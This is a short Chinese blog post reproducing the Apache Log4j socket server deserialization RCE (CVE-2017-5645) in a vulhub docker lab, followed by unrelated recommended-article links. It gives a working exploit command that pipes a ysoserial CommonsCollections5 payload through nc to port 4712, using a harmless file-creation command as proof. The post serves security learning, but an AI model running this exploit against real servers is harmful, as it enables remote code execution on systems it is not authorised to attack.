vulhub中Apache Log4j Server 反序列化命令执行漏洞复现(CVE-2017-5645)

余生有个小酒馆2024-02-20 12:59

Apache Log4j是一个用于Java的日志记录库,其支持启动远程日志服务器。Apache Log4j 2.8.2之前的2.x版本中存在安全漏洞。攻击者可利用该漏洞执行任意代码。

1.我们使用ysoserial生成payload,然后直接发送给`your-ip:4712`端口即可。

复制代码 
java -jar ysoserial-master-v0.0.5-gb617b7b-16.jar CommonsCollections5 "touch /tmp/success" | nc your-ip 4712

工具地址 https://github.com/frohoff/ysoserial

需要注意JDK版本的问题 https://github.com/frohoff/ysoserial/issues/203

2.然后执行`docker compose exec log4j bash`进入容器,可见 /tmp/success 已成功创建:

相关推荐
求知若渴,虚心若愚。1 天前
高可用实战之Nginx + Apache篇
运维·nginx·apache
阿里云云原生2 天前
Apache RocketMQ EventBridge:为什么 GenAI 需要 EDA?
apache·rocketmq
沈健_算法小生3 天前
Apache RocketMQ:消息可靠性、顺序性与幂等处理的全面实践
apache·rocketmq
老虎06273 天前
JavaWeb(苍穹外卖)--学习笔记17(Apache Echarts)
笔记·学习·apache
Bruce_Liuxiaowei4 天前
绕过文件上传漏洞并利用文件包含漏洞获取系统信息的技术分析
运维·网络安全·php·apache
lifallen4 天前
Hadoop MapReduce过程
大数据·数据结构·hadoop·分布式·apache
beijingliushao4 天前
30-Hive SQL-DML-Load加载数据
数据仓库·hive·apache
老虎06274 天前
JavaWeb(苍穹外卖)--学习笔记18(Apache POI)
笔记·学习·apache
SelectDB4 天前
Doris MCP Server 0.5.1 版本发布
github·apache·mcp
山里幽默的程序员4 天前
Apache JMeter 入门指南:从零到一的实战体验
jmeter·apache
热门推荐
01UV安装并设置国内源022025最新国内服务器可用docker源仓库地址大全(2025年8月更新)03Qwen3-Coder 快速上手教程 | Qwen Code + Claude Code04全球最强模型Grok4,国内已可免费使用!(附教程)05KGG转MP3工具|非KGM文件|解密音频06TRAE Rules 实践:为项目配置 6A 工作流07【2025.08.06最新版】Android Studio下载、安装及配置记录(自动下载sdk)08GPT-5 使用限制与国内升级全攻略(免费 / Plus / Pro)【2025 最新】09Cursor 终端“卡死/无响应”问题的解法10Claude Code + claude-code-router白嫖魔搭社区千问模型,开启AI编程之路